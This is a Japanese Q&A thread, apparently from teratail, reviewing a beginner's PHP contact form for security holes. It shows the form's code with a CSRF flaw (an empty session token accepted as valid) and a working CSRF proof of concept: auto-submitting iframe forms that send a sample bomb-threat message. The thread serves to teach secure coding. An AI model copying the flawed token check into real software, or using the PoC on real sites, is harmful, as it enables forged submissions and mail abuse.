PHPでメールフォームを作成したので、脆弱性がないかアドバイスいただけないでしょうか。
エンジニアでもなければ、PHPもろくに書けない雑魚ですが、「php メールフォーム作り方」でググって表示されるサイトを見ると、「んんんんん？？？」と思うところがあります。
これらを参考にしたり、コピペする方は、記述されているコードの良し悪しは判断できないかと思います。
そのような方々が参考にできるメールフォームを作りたいという思いで、調べて作りました。
周りに書いたコードを確認してもらえる人もいないので、皆様からのアドバイスがほしいです((_ _ (´ω｀ )ﾍﾟｺ

このメールフォームは、下記を対象者としています。

php メールフォーム作り方でググってコピペする方
コピペして動けばいいと考えている方
if文や関数など基本的な記述はわかるけど、クラスとか理解していない方
脆弱性？なにそれ？という方

そのために、このメールフォームは下記の点を意識して作成しました。

コピペしたら動く
なるべく難しい記述はしない、記述量を減らす
処理を中断する die を使っていないので、表示したい箇所にコピペすれば動く
PHP5.2.xまで想定し、環境（magic_quotes_gpc、セーフモード）に依存しない
肝心の脆弱性対策はクリックジャッキング、CSRF、XSS、メールヘッダインジェクションを考慮

最終的にはコード＋説明した記事を作成してQittaに投稿する予定です。
問題があれば、詳しい方々からアドバイスやご指摘があるはずなので...

皆様から見て、脆弱性や気になる点などあれば、アドバイスもらえると嬉しいです((_ _ (´ω｀ )ﾍﾟｺ
至らないところがあれば、調べますので、ご指摘だけでも頂けると嬉しいです。
お願いします。

入力（index.php） → 確認（confirm.php） → 送信（send.php）と画面を遷移してメールを送ります。

php
1<?php
2// 他のサイトでインラインフレーム表示を禁止する（クリックジャッキング対策）
3header('X-FRAME-OPTIONS: SAMEORIGIN');
4
5// セッション開始
6session_start();
7
8// HTML特殊文字をエスケープする関数
9function h($str) {
10	return htmlspecialchars($str,ENT_QUOTES,'UTF-8');
11}
12
13/* --------------------------------------------------
14	トークンの作成（CSRF対策）
15
16	※使用しているPHPのバージョン・環境にあわせて
17	 トークンを選んでね。不要なトークは削除してね。
18-------------------------------------------------- */
19
20// PHP 7.0 以降
21if(!isset($_SESSION['token'])) {
22	$_SESSION['token'] = bin2hex(random_bytes(32));
23}
24
25// PHP 5.3 ～ 5.x ※OPENSSL導入済
26if(!isset($_SESSION['token'])) {
27	$_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32));
28}
29
30// PHP 5.3 未満
31if(!isset($_SESSION['token'])) {
32	$_SESSION['token'] = hash('sha256', session_id());
33}
34
35// トークンを代入
36$token = $_SESSION['token'];
37
38?>
39<!DOCTYPE html>
40<html lang="ja">
41<head>
42<meta charset="UTF-8">
43<title>入力画面</title>
44</head>
45<body>
46
47<h1>お問い合わせ（入力画面）</h1>
48
49<form method="post" action="confirm.php">
50<table>
51	<tr>
52		<th>お名前（必須）</th>
53		<td><input type="text" name="name"></td>
54	</tr>
55	<tr>
56		<th>ふりがな（必須）</th>
57		<td><input type="text" name="ruby"></td>
58	</tr>
59	<tr>
60		<th>メールアドレス（必須）</th>
61		<td><input type="text" name="mail"></td>
62	</tr>
63	<tr>
64		<th>内容（必須）</th>
65		<td><textarea name="content"></textarea></td>
66	</tr>
67</table>
68<input type="hidden" name="token" value="<?php echo h($token); ?>">
69<button>送信内容確認</button>
70</form>
71</body>
72</html>

php
1<?php
2// 他のサイトでインラインフレーム表示を禁止する（クリックジャッキング対策）
3header('X-FRAME-OPTIONS: SAMEORIGIN');
4
5// セッション開始
6session_start();
7
8// HTML特殊文字をエスケープする関数
9function h($str) {
10    return htmlspecialchars($str,ENT_QUOTES,'UTF-8');
11}
12?>
13<!DOCTYPE html>
14<html lang="ja">
15<head>
16<meta charset="UTF-8">
17<title>確認画面</title>
18</head>
19<body>
20
21<h1>お問い合わせ（確認画面）</h1>
22
23<?php
24
25// セッション変数がなければ、空文字を代入
26if(!isset($_SESSION['token'])) {
27    $_SESSION['token'] = '';
28}
29
30// POSTされたデータを変数に代入（magic_quotes_gpc = On ＋ NULLバイト 対策）
31foreach (array('token','name','ruby','mail','content') as $v) {
32    $$v = filter_input(INPUT_POST, $v, FILTER_DEFAULT, FILTER_FLAG_STRIP_LOW);
33}
34
35// トークンを確認し、確認画面を表示
36if($token !== $_SESSION['token']) {
37
38    echo '<p>お問い合わせの手順に誤りがあります。<br>お手数ですが、最初からやり直してください。</p>';
39
40} else {
41
42    $error_flag = 0;
43
44    // 必須項目は未入力をチェック
45    if ($name === '') {
46        echo '<p>お名前をご入力してください。</p>';
47        $error_flag = 1;
48    } elseif (mb_strlen($name) > 50) {
49        echo '<p>お名前は 50 文字以内で入力してください。</p>';
50        $error_flag = 1;
51    }
52
53    if ($ruby === '') {
54        echo '<p>ふりがなをご入力してください。</p>';
55        $error_flag = 1;
56    } elseif (mb_strlen($ruby) > 50) {
57        echo '<p>ふりがなは 50 文字以内で入力してください。</p>';
58        $error_flag = 1;
59    }
60
61    if ($mail === '') {
62        echo '<p>メールアドレスをご入力してください。</p>';
63        $error_flag = 1;
64    } elseif (mb_strlen($mail) > 100) {
65        echo '<p>メールアドレスは 100 文字以内で入力してください。</p>';
66        $error_flag = 1;
67    } elseif (!filter_var($mail, FILTER_VALIDATE_EMAIL)) {
68        echo '<p>メールアドレスの形式が正しくありません。</p>';
69        $error_flag = 1;
70    }
71
72    if ($content === '') {
73        echo '<p>内容をご入力してください。</p>';
74        $error_flag = 1;
75    } elseif (mb_strlen($content) > 500) {
76        echo '<p>内容は 500 文字以内で入力してください。</p>';
77        $error_flag = 1;
78    }
79
80    // エラーがある場合は、戻るボタンを表示し、エラーがない場合は、確認画面を表示
81    if ($error_flag === 1) {
82        echo '<button onClick="history.back(); return false;">戻る</button>';
83    } else {
84        // セッション変数に代入
85        $_SESSION['name'] = $name;
86        $_SESSION['ruby'] = $ruby;
87        $_SESSION['mail'] = $mail;
88        $_SESSION['content'] = $content;
89
90        // 確認用画面の表示
91    ?>
92
93        <form method="post" action="send.php">
94            <table>
95                <tr>
96                    <th>お名前</th>
97                    <td><?php echo h($name); ?></td>
98                </tr>
99                <tr>
100                    <th>ふりがな</th>
101                    <td><?php echo h($ruby); ?></td>
102                </tr>
103                <tr>
104                    <th>メールアドレス</th>
105                    <td><?php echo h($mail); ?></td>
106                </tr>
107                <tr>
108                    <th>内容</th>
109                    <td><?php echo nl2br(h($content)); ?></td>
110                </tr>
111            </table>
112            <input type="hidden" name="token" value="<?php echo h($token); ?>">
113            <button>送信</button>
114        </form>
115
116<?php
117    }
118}
119?>
120</body>
121</html>

php
1<?php
2// 他のサイトでインラインフレーム表示を禁止する（クリックジャッキング対策）
3header('X-FRAME-OPTIONS: SAMEORIGIN');
4
5// セッション開始
6session_start();
7
8// mb_send_mail のエンコーディング
9mb_language('ja');
10
11// 内部文字エンコーディングを設定
12mb_internal_encoding('UTF-8');
13?>
14<!DOCTYPE html>
15<html lang="ja">
16<head>
17<meta charset="UTF-8">
18<title>送信画面</title>
19</head>
20<body>
21
22<h1>お問い合わせ（送信画面）</h1>
23
24<?php
25
26// セッション変数がなければ、空文字を代入
27if(!isset($_SESSION['token'])) {
28    $_SESSION['token'] = '';
29}
30
31// POST['token']の値をtoken変数に代入
32$token = filter_input(INPUT_POST, 'token', FILTER_DEFAULT, FILTER_FLAG_STRIP_LOW);
33
34// 各セッション変数を各変数に代入
35$name = isset($_SESSION['name']) && is_string($_SESSION['name']) ? $_SESSION['name'] : '';
36$ruby = isset($_SESSION['ruby']) && is_string($_SESSION['ruby']) ? $_SESSION['ruby'] : '';
37$mail = isset($_SESSION['mail']) && is_string($_SESSION['mail']) ? $_SESSION['mail'] : '';
38$content = isset($_SESSION['content']) && is_string($_SESSION['content']) ? $_SESSION['content'] : '';
39
40// トークンの値が一致しない場合は、エラー文を表示し、一致する場合は送信する
41if($token !== $_SESSION['token']) {
42
43    echo '<p>送信後に再度アクセスされたか、お問い合わせの手順に誤りがあります。<br>お手数ですが、最初の画面からご入力ください。<p>';
44
45} else {
46
47    /*  運営側へ送信するメールの設定  */
48
49    // 送信先のメールアドレス
50    $to      = 'xxxxxx@xxxxx.xxxx';
51    // 件名
52    $subject = '【お問い合わせからの送信】○○○○○○○○○○';
53    // 本文
54    $message = "◆お名前\n$name\n\n◆フリガナ\n$ruby\n\n◆メールアドレス\n$mail\n\n◆内容\n$content";
55    // オプション
56    $option = '-f'. $to;
57
58
59    /*  問い合わせされた方へ自動返信するメールの設定  */
60
61    // 件名
62    $auto_subject = '【お問い合わせ】○○○○○○○○○○';
63    // 送信元のメールアドレス
64    $auto_from    = 'From:' . $to;
65    // 本文
66    $auto_message = "
67※このメールは自動返信によるものです。
68
69$name 様
70
71このたびは、お問合せいただき、誠にありがとうございました。
72
73お送りいただきました内容を確認の上、担当者より折り返しご連絡させていただきます。
74    ";
75
76    /* セーフモードがONの場合は、mb_send_mailの第5引数が使えないため、処理を分岐して送信 */
77    if(ini_get('safe_mode')) {
78
79        /*  運営側と自動返信のメールの送信が完了したら、送信完了の文章を表示する  */
80        if(mb_send_mail($to, $subject, $message, "From:$mail") && mb_send_mail($mail, $auto_subject, $auto_message, $auto_from)) {
81            echo '<p>このたびは、お問合せいただき、誠にありがとうございました。<br>お送りいただきました内容を確認の上、担当者より折り返しご連絡させていただきます。</p>';
82        } else {
83            echo '<p>大変申し訳ございませんが、メールの送信に失敗しました。<br>お手数ですが最初からやり直してください。</p>';
84        }
85
86    } else {
87
88        /*  運営側と自動返信のメールの送信が完了したら、送信完了の文章を表示する  */
89        if(mb_send_mail($to, $subject, $message, "From:$mail", $option) && mb_send_mail($mail, $auto_subject, $auto_message, $auto_from, $option)) {
90            echo '<p>このたびは、お問合せいただき、誠にありがとうございました。<br>お送りいただきました内容を確認の上、担当者より折り返しご連絡させていただきます。</p>';
91        } else {
92            echo '<p>大変申し訳ございませんが、メールの送信に失敗しました。<br>お手数ですが最初からやり直してください。</p>';
93        }
94
95    }
96
97}
98
99// セッションの破棄
100$_SESSION = array();
101session_destroy();
102
103?>
104</body>
105</html>

2017.04.11 追記

徳丸氏による、脆弱性の解説です。

teratailに投稿されたメールフォームにCSRF脆弱性が残存した理由 | 徳丸浩の日記

ありがとうございます((_ _ (´ω｀ )ﾍﾟｺ

回答4件

ベストアンサー

CSRF脆弱性があるようです。PoC(Proof of Concept)を書きましたのでご確認ください。解説はしませんので、PoCから読み解いて下さい。

以下は、適当なサイトに罠として仕掛けるHTMLです。wana.htmlとします。

HTML
1<body>
2<iframe src="wana1.html"></iframe>
3<iframe src="wana2.html"></iframe>
4</body>

wana.htmlはwana1.htmlとwana2.htmlを読み込んでいます。それぞれを示します。まずは wana1.html

HTML
1<body onload="document.forms[0].submit()">
2<form action="http://example.jp/confirm.php" method="POST">
3<input name="name" value="田中">
4<input name="ruby" value="たなか">
5<input name="mail" value="tanaka@example.jp">
6<input name="content" value="○○空港を15:00に爆破します">
7<input name="token" value="">
8<input type="submit">
9</form>
10</body>

続いて、wana2.html

HTML
1<body onload="setTimeout('document.forms[0].submit()', 5000)">
2<form action="http://example.jp/send.php" method="POST">
3<input name="token" value="">
4</form>
5</body>

wana1.htmlは、被害者が罠閲覧後直ちにconfirm.phpをPOSTします。
wana2.htmlは、5秒後にsend.phpをPOSTします。
結果として、CSRF対策を回避して、空港爆破予告をメールすることになります。ご確認を。
前提として、罠閲覧時に、被害者はこのサイトのセッションはないとします。これは無理のない前提だと思います。

投稿2017/04/09 09:46

ockeghem

総合スコア11626

回答へのコメント

7968

2017/04/09 10:51

おお！すごい！すごいです！罠サイトの方法とCSRF対策の回避方法にめっちゃ感動しました٩( 'ω' )و トークンに問題があるので、改善します。まさか、徳丸氏から回答もらえとるとは、嬉しいです。参考になりました。回答ありがとうございました。

退会済みユーザー

2017/04/09 16:23 編集

ものすごく興味本位な質問ですが、この問題ってソースを見ない場合でも、辿り着けるものでしょうか？空文字ってところが脆弱なんですかね？そもそも、不適切な処理であることは理解しているんですけど、ちょっと気になったもので。

ockeghem

2017/04/09 21:42

リモート脆弱性診断（ソースは見ずにブラックボックスで診断するやつ）では、トークンを空文字列にしたり、トークンパラメータそのものを削除する（結果としてNULLになる）パターンは、ちゃんとした会社ならチェックすると思います。私が空文字列に着目した理由は、トークンチェックのif文にNULLチェックが入ってなかったからなんですが、ソース上ではissetの結果NULLの場合は空文字列をセットしていたので、空文字列ならいけるのだろうと思いました。リモート診断ではソースは確認できませんが、わりあいあるケースなので空文字列も試しますね。

退会済みユーザー

2017/04/09 23:15

ありがとうございます。理解しました。

セッション管理の問題がありそうなのはわかりましたが、セキュリティについての知識が不足したままでは、今後修正などした時に再度脆弱性を作り込んでしまいます。なので具体的な指摘はしません。

とりあえず、体系的に学ぶ安全なWebアプリケーションの作り方を読んでみてください。脆弱性の仕組みをきちんと学んでからもう一度コード全体を見直してみると良いでしょう。

(以下の内容は「安全なWebアプリケーションの作り方」を読めばわかることですので、是非書籍をお読みください)

どうも「メールフォームの機能はメールを送ることだけだから、攻撃の重点はメール送信に限られる」と考えられてる方がいるようです。大きな間違いです。

メールフォームであっても、入力の漏洩、他のアプリケーションを攻撃するための踏み台、など、メール送信機能を使わない攻撃もあり得ます。とくに、他のアプリケーションと同居して使われる場合、そのアプリケーションが単体では安全であっても、同じホストに脆弱なアプリケーションがあれば危険にさらされます。

メールフォームだからといってメールのことだけ気にしているとこのように失敗します。

もちろん、メールのことも気にしなければなりませんが、「大量メール送信」など以前に気にしなければならないことがまずたくさんあります。「大量メール送信」対策をしていても足下に脆弱性があれば無意味になります。

このあたりの感覚も、きちんと勉強していればだんだん身についてくると思います。おかしなアドバイスにも気づけるようになるでしょう。

(かくいう私も空トークンのすり抜けによるCSRFは見落としてたので勉強不足ですね)

参考までに、Webアプリケーションのセキュリティについて、ものすごく大雑把な絵を描いてみました。安全なWebアプリケーションを作るには体系的な知識が必要であること、アプリケーション固有の機能だけを気にするのだけでは無意味だということが伝わるでしょうか。

また、私の回答のせいで「安全なWebアプリケーションの作り方」という良書に対し誤った宣伝をする場を与えてしまったのは残念ですが、そのような事実は無いこと、メールフォームも含めた多くの領域のWebアプリケーションを作る上でベースとなる知識を学ぶために非常に参考になる本だということはお伝えしたいと思います。

下記のコメント欄のte2jiなる自物の投稿のうち、「安全なWebアプリケーションの作り方」についての記述は、当該書籍の内容を目次のみから妄想して書かれたものです。実際の書籍の内容を反映したものではなく、技術的な裏付けは全くありませんので、十分注意してお読みください。

投稿2017/04/06 14:38

編集2017/04/12 13:24

suzukis

総合スコア1449

2020/03/24 07:22

こちらの質問が複数のユーザーから「過去の低評価」という指摘を受けました。

回答へのコメント

退会済みユーザー

2017/04/06 16:30

今回の質問への回答として、リンク先ってあまり関係ないのでは？目次の9割関係無いように思いますが。。。

suzukis

2017/04/07 00:20

メールフォームはDBと認証こそありませんが立派なWebアプリケーションです。個別には関係ない項目はありますが、Webアプリケーションのセキュリティの基礎と、この質問の機能を実現するアプリで生じる可能性がある主要な脆弱性について初学者が網羅的に学べる**信頼できる**書籍は他に思い当たりません。それに、直接は関係無い項目であっても、基礎知識として覚えておくと安全なアプリケーションが作りやすくなります。目次だけでなく中身をお読みになった上で、こちらの方がもっとよいとお勧めされる書籍があるのであれば、是非ご紹介ください。

退会済みユーザー

2017/04/07 01:53

メールフォームで気を付けなければならないのは、「ユーザ投稿からメールが送れてしまう」ことなので、Webアプリに汎化した回答だと的外れになると思います。例えば、「体系的に学ぶ安全なWebアプリケーションの作り方」を熟読したとしても、このフォームから「大量の意味の無いメール（迷惑メール）を送れてしまう」ことに気がつくのは難しいと思います。個人的には、メールフォームは他者に迷惑をかけやすい上、問題発生時の切り分けもしんどいので、「コピペしたら動く」なんてとんでもないと思っていますが、具体的な指摘があるのであれば非常に興味深い質問です。ぜひ具体的な指摘をしてあげて下さい。

7968

2017/04/07 02:28

suzukisさん回答ありがとうございます。なるほど、セッション管理に問題があるんですね。本当に基本的なところだけですが、HTTP・GET・POST・Cookie・セッションについては調べたことがあります。・【PHP超入門】HTTP（GET・POST）について http://qiita.com/7968/items/4bf4d6f28284146c288f ・【PHP超入門】Cookieとセッションについて http://qiita.com/7968/items/ce03feb17c8eaa6e4672 自分の中では基本的な仕組み（表面的なところ）は理解できていると思っています。リクエストメッセージは安全だよねというような根本的な過ちはしてないはず...と信じたい。気になる点は、PHP5.3未満のトークンでセッションIDを用いていることです。「/dev/urandom」を用いてトークンを作成する方法もありますが、セッションIDをハッシュ化しても問題ないような...と思ってトークンに使用しています。セッションIDをそのまま利用するのは論外だと思いますが... 私の書いたコードから感じられないかもしれませんが、徳丸氏の書籍は持ってます（理解したと言ってない＞＜） te2jiさん > 「コピペしたら動く」なんてとんでもないと思っています完全に同意です。ググってコピペしたら動くのも事実なので、それならば、ググって出てくるより良いものをという思いです。

suzukis

2017/04/07 03:21

本をお持ちなのならまずはそれをしっかり学習してください。その本に書いてあることがきちんと達成できたら次の段階です。「Webにあるコードがひどいので何とかしたい」という志はご立派ですが、今のままではひどいコードを増やすだけです。質問のメールフォームでも、この本に書かれている多くの項目が該当します。的外れなコメントが付いていますが、まずWebアプリケーションに汎化した観点で安全になっていないと、アプリケーション固有の機能に関わる部分を考えても無駄です。

7968

2017/04/07 05:03 編集

私自身、Webにあるひどいコードを何とかできるほどの、スキルも理解もないのは自覚しております。そもそも、ググって参考になりそうな、コピペしても問題なそうな記事が表示されているなら、こんなことはやりたくないというのが正直なところです。ググって上位表示される記事に対抗するには「初心者」「2分でできる」「世界一簡単」「猿でもわかる」「安全」のようなタイトルにしなければなりません。 Qiitaに、私のような雑魚が書いたコードを上記のような釣りっぽいタイトルをつけて投稿するのは、頭おかしいと思っています。コメント欄で溢れ返るのは目に見えています。（コメント欄が本編になる可能性も・・・ｗ） suzukisさんの仰るとおり、徳丸氏の書籍についての理解度が少ないです。精進します＞＜

退会済みユーザー

2017/04/07 05:35

メールフォームでは、「ユーザ投稿からメールが送れてしまう」ことが最大の課題なので、ざっくり以下を実装する必要があります。・SMTP送信制御・外部からの投稿対策・連続送信制限・送信/エラーログどれも、奥が深い上、単純な少量のコードに落とすのは難しいと思います。メールフォームのライブラリは多数あるので、上記の観点から精査し紹介する方針のほうが、新たなコードを作成し公開するより有用じゃないですかね？コードとは関係ないですが、上記以外に以下の情報も必須です。・フォーム送信時の暗号化に関して・個人情報保護に関する記述私自身、メールフォームはいろいろな記事を読みましたが、7968 さんと同じような感想を持ってます。正直、まとめていただけるのであれば、非常に嬉しいです。7968 さんのまとめ、きれいだしｗうまくいくといいですね＾＾

7968

2017/04/07 07:31 編集

te2jiさんなるほど、確かに送信に関する制限や対策、制御などにも配慮する必要がありますね。正直、CSRF対策をすれば、不正な送信を阻止できると楽観視しておりました＞＜どのようにメールフォームを悪用するのか、画面遷移してCSRF対策しているメールフォームでも悪用できるのかなど、攻撃側の事情について調べていませんでした... ちょっと調べてみます。確かにライブラリという選択肢もありますね。コピペユーザーが対象なので、なるべく簡単な方法を模索します。もう最終的にはGoogleフォームを使いましょうという結論にしたい気持ちもありますw メールフォームを作るという切り口から入り、脆弱性の存在についても理解できるような記事を書けるように頑張ります^^ アドバイスありがとうございます。

退会済みユーザー

2017/04/07 09:11

メールフォームは、メールが送れてしまえば、攻撃者の勝ちです。・特定アドレスに対して大量の「受け付けました」メールを飛ばす・大量の宛先不明メールを発送され、使用ドメインをSPAMドメインとされるといったところですね。 CSRF対策を行っていても、メールフォームへの投稿プロセスを模倣し機械的にPOSTすることは簡単なので、通常のWebアプリのような対策はあまり意味がありません。どちらかと言うと対策方法は、匿名掲示板への投稿を参考にしたほうが良いです。幾つか見てみましたが、投稿フォームの最初のページを見て、一定時間経たないと投稿可能とさせないとか、POSTの間隔をIPアドレスレベルで確認して受け付けるか判断するとか、工夫されていました。また、メールを「正当に」飛ばすには、適切なメールサービスの設定が必須になります。適切に設定できていないと、「あるユーザにはメールが届くが、あるユーザにはメールが届かない」とか「届いたメールが文字化けで読めない」といった、よくある問題に遭遇します。「受け付けました」メールを自動で飛ばさないのであれば、全体的にかなり単純になりますが、現実の要求として、なかなか難しいですね＾＾；メールってホントに面倒です。。。がんばってください。

7968

2017/04/09 10:52

> CSRF対策を行っていても、メールフォームへの投稿プロセスを模倣し機械的にPOSTすることは簡単なので、通常のWebアプリのような対策はあまり意味がありません。全然知らなかったので、参考になります。ありがとうございます。頑張ります。

退会済みユーザー

2017/04/10 11:54

> suzukis さん徳丸さんも回答してくれている質問なので、ご本人に迷惑にならないようコメントしますが、メールフォームとWebアプリの持つセキュリティ要件は明確に違います。要件の違うものを前提に書かれたものを薦めても質問者を混乱させるだけです。具体的な指摘がないのも同様に質問者を混乱させます。 > 「メールフォームの機能はメールを送ることだけだから、脆弱性があっても被害はメール送信に限られる」と考えられてる方がいるようです上記のような考えもありません。最大の脅威がメール送信にあると言っているだけです。

退会済みユーザー

2017/04/10 22:28

> suzukis さん当初の回答からすると、随分まともな回答になってきましたが、もう少し質問者の方を向いた回答しましょうよ＾＾；会話が噛み合わない理由に関して考えてみました。 suzukis さんが、セキュリティ要件とセキュリティバグを混同しているためだと思います。目次でいうと、私が5章の話をしているのに、4章の話が全てだ！とコメント/回答の修正を重ねている感じです。セキュリティ要件：5章代表的なセキュリティ機能セキュリティバグ：4章 Webアプリケーションの機能別に見るセキュリティバグ私が当初コメントしたのは、セキュリティ要件に大きな差異がある本を推薦していることに違和感があったためです。メールフォーム → 認証外ユーザにフル機能を提供する必要がある前提一般的なWebアプリ → 認証ユーザを前提にロールに沿った機能提供の前提目次の機能項目の殆どが関連しません。かろうじてユーザ登録の箇所に同じような要件が発生するかもしれませんが、この目次の感じだとあまり深く突っ込んでないと思います。その為、9割関係ないと表現しました（まぁ、9割というのは過剰な表現ですが）その後の私のコメントもセキュリティ要件が合致していないことに対しての指摘です。それに対して、suzukis さんはセキュリティバグに対してコメントを重ねるため、会話がズレます。セキュリティバグはどのようなシステムを作るにも関連してくるため、網羅的な知識が必要となります。それを否定するものではありませんし、それを知るためには、「体系的に学ぶ安全なWebアプリケーションの作り方」は良書だと思いますが、要件が異なっているという指摘には全く噛み合いません。セキュリティ要件とセキュリティバグへの対応は、分けて考えることが必要です。脆弱性対応の基本なので、まずはそこを理解したほうが良いですよ。

suzukis

2017/04/10 22:58

かみ合わない理由はあなたが「読んでもない本についてこの本は役に立たないという自分の主張に沿うように勝手に内容を想像して話をしている」からです。

退会済みユーザー

2017/04/11 05:18

最大の脅威であるメール送信に関する記述が5章にないので、セキュリティ要件的に合致していないと判断しています。目次にない以上、勝手な想像では無いと思いますが。。。

suzukis

2017/04/12 02:20

自覚がないのは悪意がない証拠と好意的に解釈します。一読をお勧めしましたがどうやらそのおつもりはないようですので、読んでもなく読むつもりもなく内容も知らない本について的外れだなどと批判するのはおやめください。

退会済みユーザー

2017/04/12 08:27

最初に9割なんて煽ったから、かたくななんですかねぇ。。。なかなか伝わらない＾＾；再度書きますが、suzukis さんは、徳丸さんの本の重要な要素、セキュリティ要件とセキュリティバグを分けて考えることが理解できていません。ここを読めば3分で分かるのでオススメです。 https://www.hash-c.co.jp/security/3min/ 図は取り下げたほうが良いです。表現方法が間違っています。セキュリティバグに対しての記述が網羅的であることが、この本が良書である評価の一つなので、そこを否定するつもりはありません。メール関係の一部と最近のセキュリティバグ情報を勉強するだけで、おおよそメールフォームに関連するセキュリティバグが塞げると思います。しかし、私の指摘しているのは、セキュリティ要件に関してです。メールフォームの必要とするセキュリティ要件はざっくり以下です。・SMTP送信制御・外部からの投稿対策・連続送信制限・送信/エラーログこちらに関連する記載はごく僅かです。これが9割と言った発言につながります。すでに書きましたが、私がセキュリティ要件に関して記述しているのに、suzukis さんがセキュリティバグに関して追記するため、噛み合っていません。最初の回答はひどかったですが、修正後の回答でセキュリティバグに関して指摘したいのだと分かりました。セキュリティバグに限って言えば（あと図を消去すれば）回答としては正しいと思います。こんどこそ伝わるとイイのですけど。

退会済みユーザー

2017/04/13 05:15

もう suzukis さんの理解とか求めないので、図の削除か、修正だけでも応じてもらえませんか？【認証】アカウント管理、ログイン管理の部分を消去するか、色を替えるだけで良いです。そこを修正するだけで、suzukis さんの回答が大体正しくなるので、お願いします。修正していただければ、マイナス評価も取り消しますので。

すでに、伝えたいことは大体記述したのですが、回答としてまとめることにしました。

7968 さんの作成されたスクリプトは、「メールの配信攻撃」への対応がなされていません。
メールフォームのセキュリティ要件として、ざっくりとですが、以下の機能実装を検討する必要があります。

・外部からの投稿対策
・連続送信制限
・送信/エラーログ

これらの実装がない場合、機械的な投稿を容易に許すことになり、

・特定アドレスに対して大量の「受け付けました」メールを飛ばす
・大量の宛先不明メールを発送され、使用ドメインをSPAMドメインとされる
・サーバリソースを借りている場合、送信メール数の上限張り付きになり、事実上メールフォームが機能しない

といった被害が発生する可能性があります。

メールフォームは、認証外ユーザにフル機能を提供しつつ、その投稿を制限するという、かなりハードルの高い要求を突きつけられます。上記を加味し、セキュリティ要件を再整理してみて下さい。

おまけ

せっかく回答を作成したので追記します。

・セキュリティ要件
メール配信攻撃以外のセキュリティ要件として、ドメイン認証を検討する必要があります。
SMTPサーバを経由し、SPF/DKIMへ対応した発信が出来ないと自動送信メールが届かないケースが大量に発生します。

・セキュリティバグ
セッション関連の指摘がありましたが、多分、セッションの開始のタイミングの指摘だと思います。
以下を参考にすると良いです。
セッションの安全な管理方法について
認証外アプリのセッションの取り回しに関して、ockeghem さんが丁寧に説明してくれています。
ockeghem さんの回答の他に、ikedas さんの回答とそのコメント欄も合わせて見ると良いです。

投稿2017/04/13 07:35

編集2017/04/14 04:35

退会済みユーザー

総合スコア0

2018/02/07 03:08

こちらの質問が複数のユーザーから「過去の低評価」という指摘を受けました。

回答へのコメント

suzukis

2017/04/14 05:18

すべての悪用例とその対策を網羅する回答である必要はありませんが、一例であることを明確にした文章のほうがよいと思います。このレベルまで含めて悪用の可能性と対策を検討するのであれば、例えば正当な手順でメールフォームを使用し罠サイトのURLを含めた自動通知をそのサイトの利用者をターゲットに送信させ罠サイトに誘導する、とか、考えるべきことはたくさんあります。これには、機械的に操作されることへの対策は緩和策とはなりますが根本対策にはなりません。あと、この内容では具体的に何をやったらよいのかわからない(キーワードが曖昧なので調べようがない)点も多いので、具体的なことがわかる質問者のレベルに合わせた資料へのポインタを提示されればなおよいと思います。

退会済みユーザー

2017/04/14 11:23 編集

> すべての悪用例とその対策を網羅する回答である必要はありませんが、一例であることを明確にした文章のほうがよいと思います。私の提案は、「メールの配信攻撃」への対応を【加味した】セキュリティ要件の再整理です。明確になっていますよ。 > このレベルまで含めて悪用の可能性と対策を検討するのであれば、例えば正当な手順でメールフォームを使用し罠サイトのURLを含めた自動通知をそのサイトの利用者をターゲットに送信させ罠サイトに誘導する、とか、考えるべきことはたくさんあります。これには、機械的に操作されることへの対策は緩和策とはなりますが根本対策にはなりません。 7968 さんの作成されたスクリプトは、「自動返信で罠サイトのURLをターゲットに送信する」ことは出来ないように対策を取っています。その為、セキュリティ精度としてチグハグなスクリプトになっています。おそらく、・攻撃手法の研究・セキュリティ機能の検討・セキュリティ要件の確定・実装といった手順を踏んでいないのだと思います。その為、セキュリティ要件の再整理を提案しています。 > あと、この内容では具体的に何をやったらよいのかわからない(キーワードが曖昧なので調べようがない)点も多いので、具体的なことがわかる質問者のレベルに合わせた資料へのポインタを提示されればなおよいと思います。上にも書きましたが、攻撃手法の研究から始めることになると思います。メールフォームは認証外ユーザにフル機能を提供するため、認証後の機能提供と比べて機械的なアクセスに弱いです。メールフォームの他に、匿名掲示板やユーザ登録に関する攻撃手法、対策方法を参考にすると良いですが、イタチごっこな分野でもあるため、開示されている情報が非常に限定的です。古くからある例としては・機械的な投稿防衛のため画像認証・連続投稿防止のためのIPアドレスの記録と投稿間隔の制限・サイト訪問時間を記録し、一定以上の時間経過後しか投稿許可しない等ですが、もちろん上記に網羅性/最新性はありません。セキュリティ要件=何を保護しているかの設計図になるため、セキュリティバグと違い公開/共有しようという意識は生まれず、情報を集めるのはなかなか厳しいかと。最近は、他人になるべく迷惑をかけない事を最優先とするなら、画像でメールアドレスを張り出しておくのが最強じゃないかなぁと思っています。

suzukis

2017/04/15 00:01

個別のコードベースであればもっと検討すべき事があるのは自明なので一般論だと思ってましたが、そうでは無かったようなのでその点は失礼しました。

退会済みユーザー

2017/04/15 03:32 編集

なんかちょっとすれ違ってそうですね＾＾；記述しているのは「7968 さんの作成されたスクリプト」の「セキュリティ要件」に関してです。ところで、確認なのですが、セッション関連の指摘は、セッションの開始のタイミングのことで正しかったのでしょうか？

退会済みユーザー

2017/04/29 02:34

何を問題視していたのか知りたかったんですが残念です。。。

まずは脆弱性診断ツールを使って調べてみるのが手っ取り早くておすすめです。

投稿2017/04/06 11:22

yuki84web

総合スコア1855

回答へのコメント

7968

2017/04/06 11:30

回答ありがとうございます。なるほど、脆弱性診断ツールを使うという方法があるんですね。調べると OWASP ZAP を使うと診断できそうなので、ちょっと試してみます。

7968

2017/04/07 07:49 編集

XAMPP環境で OWSAP ZAP を試したところ下記のアラートがありました。 1. CookieのHttpOnly属性が未設定 2. WebブラウザのXSS防止機能が有効になっていません 3. X-Content-Type-Optionsヘッダの設定ミス 1に関して、HttpOnly属性に関しては、下記の通りですので、ini_set() で設定するようにします。 http://qiita.com/mpyw/items/8367f4e0983e734294da 2.3に関しては調べてみます。お陰様で上記について気づくことができました。ありがとうございます。

yuki84web

2017/04/07 11:45

あと、reCAPTCHAみたいなBOT対策もあるといいですね（すでにあったらごめんなさい

7968

2017/04/09 10:52

BOT対策も調べてみます。教えてくださり、ありがとうございます。

15分調べてもわからないことは
teratailで質問しよう！